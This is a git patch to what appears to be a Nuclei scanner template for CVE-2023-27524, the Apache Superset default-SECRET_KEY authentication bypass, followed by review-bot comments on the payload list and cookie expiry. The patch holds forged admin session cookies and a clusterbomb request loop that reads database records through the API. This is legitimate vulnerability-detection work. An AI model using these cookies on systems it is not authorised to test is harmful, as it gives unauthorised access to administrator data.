From 16de23e95f8fa84d21cff5f1e18f433995573c23 Mon Sep 17 00:00:00 2001
From: M4rtin Hsu
Date: Wed, 26 Apr 2023 17:03:59 +0800
Subject: [PATCH] Updated CVE-2023-27524 Template

---
 cves/2023/CVE-2023-27524.yaml | 30 +++++++++++++++++++++++-------
 1 file changed, 23 insertions(+), 7 deletions(-)

diff --git a/cves/2023/CVE-2023-27524.yaml b/cves/2023/CVE-2023-27524.yaml
index daf418efa2..3835f9e1a0 100644
--- a/cves/2023/CVE-2023-27524.yaml
+++ b/cves/2023/CVE-2023-27524.yaml
@@ -2,11 +2,12 @@ id: CVE-2023-27524
 
 info:
   name: Apache Superset - Authentication Bypass
-  author: DhiyaneshDK
+  author: DhiyaneshDK,_0xf4n9x_
   severity: high
   description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.
   reference:
     - https://github.com/horizon3ai/CVE-2023-27524
+    - https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
     - https://nvd.nist.gov/vuln/detail/CVE-2023-27524
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
@@ -21,15 +22,30 @@ info:
 requests:
   - raw:
       - |
-        GET /login/ HTTP/1.1
+        GET /api/v1/database/{{path}} HTTP/1.1
         Host: {{Hostname}}
-        Accept: */*
+        Cookie: session={{session}}
-      - |
-        GET /api/v1/database/1 HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: session=eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEfQPg.Enz83rUqMAFfdCds7ClQzlEmScg
+    payloads:
+      path:
+        - '1'
+        - '2'
+        - '3'
+        - '4'
+        - '5'
+        - '6'
+        - '7'
+        - '9'
+        - '10'
+      session:
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'
+    attack: clusterbomb
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
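Review bot: The new `path` payload list skips `'8'` (it runs `'7'`, `'9'`, `'10'`), which reads as an accidental omission rather than a deliberate exclusion; either add `- '8'` or leave a comment above the list saying why that id is left out. The five `session` values share the same signing timestamp segment (`ZEjVxg`) and nothing in the hunk says what distinguishes them, so a comment such as `# one pre-signed cookie per default SECRET_KEY, all signed on the same date; regenerate when they age out` would save a maintainer from guessing. That comment matters because Flask's default session interface presumably applies PERMANENT_SESSION_LIFETIME (31 days unless configured) as max_age when loading the cookie, so these fixed values will start producing false negatives without any change to the template. With `attack: clusterbomb` over 9 paths and 5 sessions the template can issue up to 45 requests per host before `stop-at-first-match` stops it, which is worth stating in `info:` for anyone tuning scan volume. The `matchers:` list continues past the end of the hunk.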